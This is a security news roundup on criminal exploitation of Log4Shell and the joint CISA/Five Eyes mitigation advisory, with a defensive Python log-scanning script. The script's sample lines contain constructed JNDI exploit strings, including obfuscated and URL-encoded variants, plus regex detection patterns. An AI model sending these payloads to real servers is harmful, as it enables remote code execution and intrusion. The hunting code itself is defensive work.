Criminal organizations continue to make hay of the Log4j vulnerabilities. The latest campaign to surface, Venture Beat reports, is using TellYouThePass, an older strain of ransomware that has been seen used mostly against Chinese targets and that had been relatively inactive until Log4shell gave it fresh impetus. It now joins Khonsari and Conti among the ransomware families observed exploiting the flaw.
Banking Trojans are also joining ransomware in the criminal exploitation of Log4shell. Cryptolaemus confirms seeing the Dridex banking Trojan delivered as the payload of a Log4j exploit. BleepingComputer reports that both Dridex and Meterpreter (the Metasploit post-exploitation payload) have now been observed landing on vulnerable systems. Dridex, it's worth noting, has also served as a precursor to ransomware attacks, so a Dridex infection via Log4shell should be treated as a likely first stage rather than the final objective.
CISA this morning announced, in conjunction with its domestic and international Five Eyes partners, Alert (AA21-356A) Mitigating Log4Shell and Other Log4j-Related Vulnerabilities:
"The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), the Computer Emergency Response Team New Zealand (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) are releasing this joint Cybersecurity Advisory (CSA) to provide mitigation guidance on addressing vulnerabilities in Apache’s Log4j software library: CVE-2021-44228 (known as “Log4Shell”), CVE-2021-45046, and CVE-2021-45105. Sophisticated cyber threat actors are actively scanning networks to potentially exploit Log4Shell, CVE-2021-45046, and CVE-2021-45105 in vulnerable systems. According to public reporting, Log4Shell and CVE-2021-45046 are being actively exploited."
The advice falls into three categories:
- "Identifying assets affected by Log4Shell and other Log4j-related vulnerabilities,
- "Upgrading Log4j assets and affected products to the latest version as soon as patches are available and remaining alert to vendor software updates, and
- "Initiating hunt and incident response procedures to detect possible Log4Shell exploitation."
The advice is comprehensive and specific, yet brief enough to be readily actionable.
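The third category, hunting for exploitation attempts, is the one most defenders can start on today with the logs they already have. The snag is that the attackers seen in the wild rarely send a plain `${jndi:ldap://...}` string; they hide it behind Log4j's own lookup syntax (`${lower:j}`, `${::-j}`) and URL encoding, so a naive grep misses them. The following is an added illustration, not code from the advisory or from any of the organizations named above: a small normalizer that unwraps those obfuscations before matching, run over constructed sample access-log lines (the addresses are documentation ranges, and the payloads are written for this example, not captured traffic).

```python
import re
from urllib.parse import unquote

# Constructed sample web-server access log lines for this example (not real captures).
# 203.0.113.0/24 and 198.51.100.0/24 are the RFC 5737 documentation networks.
SAMPLE_LINES = [
    # 1: plain JNDI lookup in the User-Agent
    '203.0.113.7 - - [20/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    # 2: "jndi" and "rmi" hidden with ${lower:...} case lookups
    '203.0.113.7 - - [20/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:r}mi://203.0.113.10:1099/a}"',
    # 3: each letter hidden with the default-value syntax ${::-x}
    '203.0.113.7 - - [20/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/x}"',
    # 4: URL-encoded payload in a query parameter
    '203.0.113.7 - - [20/Dec/2021:10:01:05 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    # 5 and 6: benign traffic, the second one containing a harmless encoded dollar sign
    '198.51.100.3 - - [20/Dec/2021:10:01:06 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"',
    '198.51.100.4 - - [20/Dec/2021:10:01:07 +0000] "GET /search?q=%24100+laptop HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/96.0"',
]

# ${lower:x} / ${upper:x} -> x. We keep the literal as written because the
# final JNDI match below is case-insensitive anyway.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}$]*)\}", re.IGNORECASE)
# ${anything:-x} -> x, which covers ${::-j} as well as ${env:NOPE:-j}.
# The lazy quantifier lets the innermost lookup match first.
_DEFAULT_VALUE = re.compile(r"\$\{[^{}$]*?:-([^{}$]*)\}")
# What we want to see once the wrapping is gone; group 1 is the JNDI scheme.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo URL encoding and Log4j lookup obfuscation until the text stops changing."""
    text = unquote(unquote(text))  # single and double URL encoding
    for _ in range(max_rounds):  # bounded so a pathological line cannot loop forever
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines):
    """Return (line_number, jndi_scheme, normalized_payload) for every suspicious line."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        norm = normalize(raw)
        m = _JNDI.search(norm)
        if not m:
            continue
        end = norm.find("}", m.start())
        payload = norm[m.start():end + 1] if end != -1 else norm[m.start():]
        hits.append((number, m.group(1).lower(), payload))
    return hits


if __name__ == "__main__":
    for number, scheme, payload in scan_lines(SAMPLE_LINES):
        print(f"line {number}: jndi scheme={scheme} payload={payload}")
```

Lines 1 to 4 are flagged and the two benign lines are not; the normalized payload is what you would pivot on (the callback host and port) when checking egress logs for the LDAP, RMI or DNS connection that a successful exploit would have made. This covers the obfuscations commonly reported in the first weeks of Log4shell scanning; it is a hunting aid, not a substitute for patching, and new wrappings will keep appearing.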
Belgium's Ministry of Defense continues to recover from its own experience with Log4shell. SC Magazine points out that, while that Ministry may be the first prominent government victim of Log4shell exploitation, it is unlikely to be the last: given how widely Log4j is deployed, it was always reasonable to expect such attacks, and more official bodies will probably be hit through the same flaw.
The US Department of Homeland Security is taking the risk seriously. US Secretary of Homeland Security Mayorkas tweeted his Department's expansion of its bug bounty program to include Log4j: "In response to the recently discovered log4j vulnerabilities, @DHSgov is expanding the scope of our new #HackDHS bug bounty program and including additional incentives to find and patch log4j-related vulnerabilities in our systems."